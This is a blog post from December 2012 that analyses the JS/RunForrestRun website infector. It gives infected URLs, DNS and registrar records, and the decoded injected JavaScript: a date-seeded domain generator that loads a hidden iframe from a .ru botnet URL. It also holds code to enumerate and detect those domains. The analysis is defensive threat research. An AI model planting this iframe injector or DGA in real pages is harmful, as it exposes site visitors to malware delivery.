Wednesday, December 12, 2012

JS/RunForrestRun Infector ComeBack! Full Disclosure of Decoding URL, DGA Domain List, Registrar & DNS info.

Today I will fully disclose the new pseudo-random domain / DGA of the infector
JS/RunForrestRun, which we just spotted making its "come-back" in action.

It started with hundreds of infections found via spam emails linking to URLs such as:
//case -1-
h00p://www.osmanoguz.net/?p=422
h00p://www.osmanoguz.net/afferim-nan-sana-google.html
h00p://www.osmanoguz.net/artik-buralardayim-be-google.html
h00p://www.osmanoguz.net/ay-lav-yu-full-izle.html
h00p://www.osmanoguz.net/?p=1677
h00p://www.osmanoguz.net/2009un-en-kotu-oyunlari.html
h00p://www.osmanoguz.net/?p=2530
h00p://www.osmanoguz.net/?p=1821
h00p://www.osmanoguz.net/?p=1829
h00p://www.osmanoguz.net/?p=2477
 :

//case -2-
h00p://www.fotoajanda.com/?amp;album=140&id=3375&kategori=8&p=album
h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=album
h00p://fotoajanda.com/?album=25
h00p://fotoajanda.com/?album=68
h00p://fotoajanda.com/?album=89
h00p://www.fotoajanda.com/?p=album&kategori=8&album=66&id=1777
h00p://www.fotoajanda.com/?p=album&kategori=8&album=140&id=3375
h00p://fotoajanda.com/?amp;album=3&id=22/&kategori=5&p=album
 :
We reported osmanoguz.net right away and received a cleanup response right away (thumbs up!). But the infection using fotoajanda.com is still ACTIVE, UP & ALIVE, as shown in the download PoC below:
--13:58:37--  h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=album
Resolving www.fotoajanda.com... 89.107.228.218
Connecting to www.fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25,838 (25K) [text/html]
13:58:39 (26.68 KB/s) - `./sample2.txt' saved [25838/25838]

--14:00:17--  h00p://fotoajanda.com/?album=25
Resolving fotoajanda.com... 89.107.228.218
Connecting to fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75,063 (73K) [text/html]
14:00:20 (45.54 KB/s) - `./sample3.txt' saved [75063/75063]
The web server info itself can be seen in the headers of the request below:
GET /?amp;album=140&id=3375&kategori=8&p=album HTTP/1.0
User-Agent: Get well soon Razor! I'm banging this infector for your health!
Accept: */*
Host: www.fotoajanda.com
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Dec 2012 04:43:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14
X-Powered-By: PleskLin
Content-Length: 25838
---response end---
200 OK
Length: 25,838 (25K) [text/html]
13:43:47 (26.19 KB/s) - `./sample' saved [25838/25838]
FINISHED --13:43:47--
Downloaded: 25,838 bytes in 1 files
And I guess the IP/site doesn't look clean to me. At this point I looked up the IP used by this infector domain, which is 89.107.228.218, and was surprised by the many malicious domains resolving to this IP, as below:
fotoajanda.com          A  89.107.228.218
armonipiyanodersi.com   A  89.107.228.218
www.radyopop.com        A  89.107.228.218
dorukuzgur.com          A  89.107.228.218
datants.com             A  89.107.228.218
thierrydiniz.com        A  89.107.228.218
ozge.net                A  89.107.228.218
www.ozge.net            A  89.107.228.218
demle.net               A  89.107.228.218
yayindayiz.biz          A  89.107.228.218
Some of the malicious domains use a www subdomain as a CNAME:
www.fotoajanda.com        CNAME  fotoajanda.com
www.armonipiyanodersi.com CNAME  armonipiyanodersi.com
www.dorukuzgur.com        CNAME  dorukuzgur.com
www.datants.com           CNAME  datants.com
www.yayindayiz.biz        CNAME  yayindayiz.biz
The same IP is also used as the DNS server for the malicious domains below:
ns1.trserver.com   A  89.107.228.218
ns.yayindayiz.biz  A  89.107.228.218
ns.dorukuzgur.com  A  89.107.228.218
In the downloaded data you'll see the injected malcode at the end of every file, as in the snippet below:
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114..
41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117..
34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,..
112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100..
 :
,53,52,93,59,118,61,34,101,118,97,34,59,125,105,1
14,61,83,116,114,105,110,103,59,122,61,40,40,101,
61,49,41,123,106,61,105,59,105,102,40,101,41,115,
7,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,
101,40,115,41,59,125,10));/*qhk6sa6g1c*/</script>
This suggests the format of the obfuscated JS/RunForrestRun infector. The obfuscated code can be easily decoded to reveal the pseudo-random domain / DGA used by this infection, as in the decoded code below:
// Lehmer (multiplicative congruential) generator with A = 48271, M = 2^31 - 1.
// Note that Q = M / A is a floating-point division in JavaScript, so this is
// not a textbook Schrage step; anyone reproducing the DGA must copy it as-is.
function nextRandomNumber(){
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if(test > 0){
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

// The seed is derived from the victim's local month, day of month and an
// afternoon flag (hour > 12). The year is not part of the seed.
function RandomNumberGenerator(unix){
    var d = new Date(unix*1000);
    var s = d.getHours() > 12 ? 1 : 0;
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

// Scale the generator's [0,1] output to an integer in [Min, Max].
function createRandomNumber(r, Min, Max){
    return Math.round((Max-Min) * r.next() + Min);
}

// Build a <length>-letter hostname in the given zone from the date-seeded generator.
function generatePseudoRandomString(unix, length, zone){
    var rand = new RandomNumberGenerator(unix);
    var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
    var str = '';
    for(var i = 0; i < length; i ++ ){
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

// Half a second after load, inject a hidden 0x0 iframe pointing at today's DGA domain.
setTimeout(function(){
    try{
        if(typeof iframeWasCreated == "undefined"){
            iframeWasCreated = true;
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "h00p://"+domainName+"/runforestrun?sid=botnet2");
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
        }
    }catch(e){}
}, 500)
The code above produces .RU domains defined by the date, forming the infector URL with the structure below:
http://****.ru/runforestrun?sid=botnet2
Cracking the domains used by this DGA is really easy :-) Just replace the body of the setTimeout try block with the code below (switching the year between 2012 and 2013):
// Replaces the body of the setTimeout try block; document.write() prints into the page.
// A fresh Date per day avoids the month roll-over that setMonth() on the 31st causes,
// and the explicit 13:00 sets the afternoon flag that the seed uses.
var year = 2013;   // 2012 gives the same list: the seed carries no year term
for (var yyy = 0; yyy < 12; yyy++) {
    for (var xxx = 1; xxx < 32; xxx++) {
        var nextday = new Date(year, yyy, xxx, 13);
        if (nextday.getMonth() != yyy) break;   // past the last day of this month
        var unix = Math.round(nextday.getTime() / 1000);
        var domainName = generatePseudoRandomString(unix, 16, 'ru');
        document.write(xxx + " | " + domainName + "  |  " + nextday + "\n");
    }
}
[IMPORTANT!] It will generate the domains used by this infection, as listed in the pastebin here --->>[PASTEBIN]
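As an added example (not code from the post or from the infector), here is a defender-side port of the decoded DGA above, kept in JavaScript so that Number division and % behave exactly as in the infector. It enumerates both daily candidates (the seed's afternoon flag gives every day two domains, and the seed carries no year term, so the 2012 and 2013 lists coincide) and checks an observed hostname against the candidates for a window of days; the function and parameter names are my own.

```javascript
// Lehmer generator as decoded: A = 48271, M = 2^31 - 1, but Q = M / A is a
// floating-point quotient (not Schrage's integer q), so it is replicated as-is.
function RunForrestRng(seed) {
  this.seed = seed;
  this.A = 48271;
  this.M = 2147483647;
  this.Q = this.M / this.A;
  this.R = this.M % this.A;
  this.oneOverM = 1.0 / this.M;
}
RunForrestRng.prototype.next = function () {
  var hi = this.seed / this.Q;
  var lo = this.seed % this.Q;
  var test = this.A * lo - this.R * hi;
  this.seed = test > 0 ? test : test + this.M;
  return this.seed * this.oneOverM;
};

// Seed from month (0-11), day of month and the afternoon flag (getHours() > 12).
// No year term: each calendar day maps to the same two domains every year.
function seedFor(month, day, afternoon) {
  return 2345678901 + month * 0xFFFFFF + day * 0xFFFF + Math.round(afternoon * 0xFFF);
}

function domainFor(month, day, afternoon, length, zone) {
  var rng = new RunForrestRng(seedFor(month, day, afternoon));
  var str = '';
  for (var i = 0; i < length; i++) {
    str += String.fromCharCode(97 + Math.round(25 * rng.next())); // 'a'..'z'
  }
  return str + '.' + zone;
}

// Both candidates for every day within +/- windowDays of refDate (local time,
// as getMonth()/getDate() are evaluated in the victim's browser).
function domainsAround(refDate, windowDays) {
  var out = [];
  for (var d = -windowDays; d <= windowDays; d++) {
    var day = new Date(refDate.getTime());
    day.setDate(refDate.getDate() + d);
    out.push(domainFor(day.getMonth(), day.getDate(), 0, 16, 'ru'));
    out.push(domainFor(day.getMonth(), day.getDate(), 1, 16, 'ru'));
  }
  return out;
}
// Detection helper for DNS or proxy logs: is this hostname a RunForrestRun
// candidate for the days around the time it was observed?
function isRunForrestDomain(hostname, refDate, windowDays) {
  return domainsAround(refDate, windowDays).indexOf(hostname.toLowerCase()) !== -1;
}
```

To compare with the checker output above, call domainFor(10, 6, 1, 16, 'ru') and domainFor(10, 7, 1, 16, 'ru') for the two afternoon dates in November 2013 that the post lists.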

Are these really to-be-in-use malware domains?

Checking this theory is simple: if we can find that some of those domains are currently alive/registered, the theory is confirmed. Checking almost 400 domains by hand will not be easy, which is why I uploaded the script/tools for this purpose to our Google Project download page here --->>[MMD Google Project]. The check turned up some domains currently UP & ALIVE, PoC↓
  :
bhigmqckbqhleqlo.ru,91.233.244.102,   //  Wed Nov 06 2013 15:50:08 GMT+0900
nsjosicxuhpidhlp.ru,91.233.244.102,   //  Thu Nov 07 2013 15:50:08 GMT+0900
  :
So is the download URL for this infection up as well? If the URL is also up it will not return 404, and the PoC is proven↓
--16:29:50--  h00p://bhigmqckbqhleqlo.ru/runforestrun?sid=botnet2
Resolving bhigmqckbqhleqlo.ru... 91.233.244.102
Connecting to bhigmqckbqhleqlo.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OK

--16:31:03--  h00p://nsjosicxuhpidhlp.ru/runforestrun?sid=botnet2
Resolving nsjosicxuhpidhlp.ru... 91.233.244.102
Connecting to nsjosicxuhpidhlp.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OK
↑Yep! Both HOST & URL are UP and ALIVE! The DGA domain list theory for this case's infector is proven!

What internet service / ISP / DNS are these bad actors using?

So let's look it up...
bhigmqckbqhleqlo.ru.  3600  IN   SOA   dns1.webdrive.ru. admin.webdrive.ru. 1354094642 10800 3600 604800 3600
nsjosicxuhpidhlp.ru.  3600  IN   SOA   dns1.webdrive.ru. admin.webdrive.ru. 1354095124 10800 3600 604800 3600

bhigmqckbqhleqlo.ru.  3600  IN   A     91.233.244.102
bhigmqckbqhleqlo.ru.  3600  IN   NS    dns1.webdrive.ru.
bhigmqckbqhleqlo.ru.  3600  IN   NS    dns2.webdrive.ru.

nsjosicxuhpidhlp.ru.  3382  IN   A     91.233.244.102
nsjosicxuhpidhlp.ru.  3381  IN   NS    dns2.webdrive.ru.

dns1.webdrive.ru.     1991  IN   A     176.74.216.129
dns2.webdrive.ru.     1990  IN   A     159.253.133.210
So they are using WEBDRIVE.RU registration for the domains, interesting! Following this lead, we find OTHER malware domains on the same IP:
donotwantyou787.ru   A  91.233.244.102
nsjosicxuhpidhlp.ru  A  91.233.244.102
Cool, we have more evil domains. It is indeed interesting! Furthermore, I doubt the DNS servers below are used for ONLY good domains.. I bet there are EVIL domains registered inside them..
ns1.unitedplatform.com  A  176.74.216.129
ns1.daodomains.com      A  176.74.216.129
ns1.regway.com          A  176.74.216.129
n1.reg3.ru              A  176.74.216.129
ns1.nic-online.ru       A  176.74.216.129
dns1.webdrive.ru        A  176.74.216.129
ns1.getdomen.ru         A  176.74.216.129
ns1.yoursdomain.ru      A  176.74.216.129
dc1.nserver.ru          A  176.74.216.129
ns1.donax.ru            A  176.74.216.129

ns2.unitedplatform.com  A  159.253.133.210
ns2.daodomains.com      A  159.253.133.210
ns2.regway.com          A  159.253.133.210
n2.reg3.ru              A  159.253.133.210
ns2.nic-online.ru       A  159.253.133.210
dns2.webdrive.ru        A  159.253.133.210
ns2.getdomen.ru         A  159.253.133.210
dc2.nserver.ru          A  159.253.133.210
ns2.donax.ru            A  159.253.133.210

How bad is the "Come-Back" infection of RunForrestRun?

Well, at least the URLs below were found infected with the same obfuscated infector JavaScript code:
// New Infection of PseudoRandom(DGA) RunForrestRun
// December 9th - 11th, 2012 
and many more before the 9th of Dec, 2012.
*) The infection reports were sent..

The moral of this post is...

Friends, you will do a very good deed for our internet if you just BLOCK every domain, IP address & DNS server reported in this post. We took the effort to prove this theory through several rechecks before disclosure.

#MalwareMustDie
